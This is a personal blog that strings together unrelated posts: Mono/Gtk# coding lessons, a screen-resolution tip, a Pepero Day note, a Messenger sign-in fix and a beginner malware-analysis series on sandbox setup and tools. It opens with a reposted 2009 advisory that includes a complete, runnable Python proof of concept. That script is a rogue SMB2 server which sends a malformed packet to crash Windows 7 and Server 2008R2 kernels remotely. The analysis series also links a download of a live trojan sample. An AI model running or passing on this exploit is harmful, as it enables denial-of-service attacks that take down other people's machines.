- Prison Code Breaker Diary -

=> aka: Nhật Kí Code Tù

Categories

Check it out: http://www.chromium.org/chromium-os/building-chromium-os

You can download the source and building your own. Give it a try!

Source from: Laurent Gaffie blog
I copy it here:

This bug is a real proof that SDL #FAIL
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be trigered outside the lan via (IE*)
The bug is so noob, it should have been spotted 2 years ago by the SDL if the SDL had ever existed:

netbios_header = struct.pack(">i", len(''.join(SMB_packet))+SMB_packet
(The netbios header provide the length of the incoming smb{1,2} packet)

If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow !
WHAT ?? you gotta be kidding me where's my SDL ?!?

"Most secure Os ever";
What ever your firewall is set to, you can get remotly smashed via IE or even via some broadcasting nbns tricks (no user interaction)
How funny.

Advisory:

=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()



V. BUSINESS IMPACT
-------------------------
An attacker can remotly crash any Windows 7/Server 2008R2
on a LAN or via IE

VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windowns Server 2008R2

VII. SOLUTION
-------------------------
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.

VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknoledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
More Remote Kernel FD @MS to come.

Programming .NET is one of the first thing I've learned myself long ago, but only available in Windows Operating System.
Somehow, the Mono Project has made .NET Framework become a cross-platform environment that you can freely programming .NET for Windows, Linux, MacOS...in that system directly. Also, you can write a .NET program for Linux under Windows and vice-versa. It's really a great achievement that Mono Project has reached. I expect that Mono Project will achieve more impressive goals with .NET technology in the future as it develops.
I write this guide as a journal in programming .NET under Linux environment by using Mono Project.
You may take this as a reference for Gtk#.

1 - Documentation and Reference:
Here the list that I read and reference from:
Gtk# Tutorial Page by Mono
Mono Documentation Library (equivalent to MSDN)
Mono: A Developer's Notebook (Edd Dumbill, Niel M. Bornstein) - A great book, worth to buy for two reasons:
+ It's the only book on Mono up to this time.
+ It's written as a developer's journal style, so it's really easy to catch the authors' mind concepts.

2 - Programming Gtk# Journal

Lesson 1: Say Hello
Lesson 2: Hello Gtk# (using Form)
Lesson 3: MonoDevelop IDE vs. manual text coding w/ commands. (to be updated...)


Feel free to comment!
Have fun!

Download Project

We do the same thing with Lesson 1 but this time we use form for better GUI.
This is the source code, self-explained fully-commented.



using System;
using Gtk;

public class Lesson_2
{

public static void Main() {

Application.Init();

// create a window
Window window = new Window("Lesson 2: Say hello with Gtk# Form");
window.Resize(400, 40);

// create a label
Label label = new Label("Hello Gtk# .NET");
// add label to the form
window.Add(label);
// show form and its widgets
window.ShowAll();

Application.Run();
}
}


Build and run, this is result:


Have fun!

Download Project: Lesson 1 - Say Hello Gtk#

First, open MonoDevelop and create a new empty project. Then, add an empty class file into project. Copy this code below to the file:


using System;

public class Lesson_1 {

public static void Main() {
Console.WriteLine("Lesson 1: Hello Gtk#! It's so wonderful!");
}
}

If you already know C#, you, hence, know what it means.

Now click on the menu Build -> Build Solution or F8.
Click menu Run -> Run or Ctrl+F5.
You will have result like this:

The result is shown under the Application Output textbox.

However, if you want to compile a single C# file or a C# project manually, then do this.

Open the terminal:

terminal> mcs -pkg:gtk-sharp-2.0 Main.cs

A file named Main.exe will be generated. In order to run this file you have to use mono utility:

terminal> mono Main.exe

The result will show up exactly how it is while using MonoDevelop.

Have fun!

Use xrandr utility to change the screen resolution.
Example, if I want to change my screen resolution into 1280x800 (60 Hz) I will type


terminal> xrandr -s 1280x800

Have fun!

Yea, today Nov-11 a Pepero Day. What is it anyway?
In Korea, it's a day that males and females give chocolate sticks to each others to show his/her love towards other. Sound interesting, huh?
Here the definition:

Pepero
(빼빼로) is a cookie stick, dipped in chocolate syrup, manufactured by Lotte in South Korea since 1983.[1] It was inspired by the Japanese product, Pocky produced by Glico


Love is a sweet chocolate love stick.

Why is this day picked? Some of my friends say that just imagine writing the date and month in number: Nov-11 => 11-11. I don't really get it angkatkening.
But I know for sure Lotte make big money from this duit...
It has become a cultural thing among young Koreans!

What an interesting day!

Situation:

Error 80048820 and extended error 80048416: You can't sign in to Windows Live Messenger

Access Control Panel -> Internet Options
Click tab Advanced, under Security section, clear the tick at "Check for server certificate revocation" check box.
Click OK.

We need some monitoring tools loading up before tracking the malware. In this case, I open ProcessXP, ProcMon and TCPView.




The malware I use this time to monitoring is Trojan.Win32.DesktopPuzzle
Now, activate virus to see what happen next...(s.c.a.r.y... :D)

A dialog appears with some note, like a joke
Don't click OK yet, switch to ProcessXP to check its info



It's like the author intentionally leaving his name there.
The PID is 1424 (it is different from your system), then we switch to ProcMon to filter.
Press CTRL+L or menu Filter->Filter then choose PID, input the malware process id, click Add, Apply, then OK, you will have this result similarly:


Ok! Now it's time to click the OK button of the "Joke Dialog".

This is the funny result after clicking it ...

Yea...it's frikkin' weird..

Now press Ctrl+Alt+Del, the task manager will show up, just kill the malware process and everything comes back to normal.

Check again on ProcessXP, we can see that it stopped and nothing else spawns, which means there is no weird thing running and system is just fine by now.

View on the event log in ProcMon, we can easily see that it doesn't do anything harm to the system. It just creates several files unharmed and access some DLL to create viewport of desktop, which makes desktop like a puzzle.
Since this is just a simple sample of malware, so it's a good practice to start with.
Simple but require lots of skills, you may find a hard one later on.
You can find lots of malware out of Internet and try yourselves.

The one that I use here is called "Joke Slider" - unwanted program :))

Have fun!

This step is very simple, we need an anti-virus scanner to identify what the heck is `that thing`.
You might already have installed an anti-virus for your system like Kaspersky Internet Security, Panda Antivirus, ClamAV, AVG, NOD-32....whatever :D
I also use online virus scanners to detect virus.
Here the list of online scanners:

  • VirusTotal: http://www.virustotal.com/
  • BitDefender Online Scanner: http://www.bitdefender.com/scanner/online/free.html
  • Kaspersky Lab: http://www.kaspersky.com/virusscanner/
  • TrendMicro - Housecall: http://housecall.trendmicro.com/
  • F-Secure Online Virus Scanner: http://www.f-secure.com/en_EMEA/security/security-lab/tools-and-services/online-scanner/
  • Panda Active Scan: http://www.pandasecurity.com/homeusers/solutions/activescan/
They're all good scanners; however, VirusTotal is the best one, awesome I think, because it uses most of popular scanners to trace the result and make a list. Additionally, it does query virus file information like import/export, API, function call....pretty convenient!!!

Let's start our journey!

First, we need a malware, I pick a Trojan, Trojan.Win32.VirtualRoot (or CodeRed).
Click here to download Trojan.Win32.VirtualRoot

Then, extract the file, don't double click on it or you're dead. Assuming that you are under virtual machine, ok? Don't do this on your main system.

Access VirusTotal homepage and upload the file (extracted one ...), here the result:

Interesting, huh? As you can see most of scanners identify it as VirtualRoor or CodeRed.
Also, there are something interesting below:


It let us know its MD5 and SHA1 hash, PE information, entry point address, library import/export (kernel32.dll, advapi32.dll) and all API called if it is activated (double-click :D).
Wow, they're valuable information for us in order to monitor and tracking events. Especially, it's very helpful for dissassemly.

Remember, whether you can identify the malware or not, we still need to test it in reality in order to confirm the malware. It's great to write an analysis about the one not being reported yet, isn't it?

Let's stop here!

Have fun!

There are some terminology that you need to know.

1. Malware
2. Virtual Machine
3. Snapshot
4. Disassembler
5. Portable Executable

If there is any more term related, I will post it here.

Have fun!

Before starting to work with malware, you probably need some basic knowledge as requirements. Of course, it's great if you have high experiences in this area.
Here is something I recommend you to know before moving to next step.

  1. You must be very familiar with Windows and can use it well. What does that mean? Well, it's simple; you can fix when something goes wrong, you know and can use Windows utilities to fix problems ( msconfig-MS Configuration Utility, regedit-Registry Editor... )...
  2. Already have experiences dealing with virus, worm, trojan...
  3. Know how to use VMWare or any virtual machine effectively, being able to control Snapshots.
  4. Understand assembly code and how it works because we're gonna spend time on disassembling and debugging.
  5. Know how to how OllyDbg and IDA.
That's all I guess. It takes your patience and learning ability.

Have fun!

You need to install these tools and utilities to work with:

  1. Sysinternals Suite: available from: http://sysinternals.com/
  2. OllyDbg: available from: http://ollydbg.de/
  3. IDA Pro (freeware): available from: http://www.hex-rays.com/idapro/
  4. PEiD: available from: http://www.peid.info/
  5. Several packer and unpacker around if require.
You will find more utilities around Internet that can be useful for your work. Just hang around with Google!
Get ready for the next step!

Have fun!

The very first step to think about testing or analyzing application or malware is to prepare yourself an appropriate environment that is under control. It's simple:

  • You don't want the application or malware to take the real effects or damage your lovely environment.
  • You can control and do whatever you want inside the box.
  • It's very effective and easy to work.
However, it does have some drawbacks:
  • Consume more resources, can cause harm to your computer, such as heating, slow like hell, unexpected NOT RESPONDING of Windows OS overtime ....
  • Cost may be high depending on your personal references like using 2 or more computers to test, pay high for commercial software (VMWare Workstation...), ..
But that's not the problem if you are well-financial or well-supported or even illegalism, pirated software. Make your own choice!

For this series, I will use VMWare Workstation for this series.
What about VMWare Workstation?
  1. It's a virtual machine manager, which provides you the functionality to create and test any operating system inside your main OS and doesn't affect your main one.
  2. Get it here: http://www.vmware.com/products/workstation/ . You have 30 days trial for now. It's a good try! My suggestion: buy if you have money because it is so GOOOOD...
  3. It concerns your hardware requirements. Well, at least 2 GB Ram and share 1/3 or 1/4 to virtual OS is better. It's up to you!
What OS to test, then?
I think it is better to try to common operating system, Windows XP SP2 or SP3.
Here is my virtual OS specifications and settings:


We're gonna take advantages of snapshots while testing the malware.
So for now, setup your environment and get ready for the next shot!

Have fun!

Virus, worms, trojans, mal-application .... or whatever, malware is growing days by days.
I myself have a little interest in this, and am trying my best to practice and analyze them.
Just beginning but hope it will help somebody.

I. Preparation:
1. Creating a controlled environment.
2. Setting up tools and utilities.
3. Basic knowledge and understandings.
4. Terminology.

II. Analysis:
1. Identifying the malware.
2. Monitoring events.
3. Debugging / Disassembling the malware.
4. Verifying and conducting the malware.

II. Conclusion:
1. Summarizing the malware.
2. Special notes or references.

Every section and steps will be written soon and linked to the notes on my blog.
Take your time and gimme any suggestion to improve or correct mistakes.

Have fun!

Download it here: PDF | DOC

Enjoy!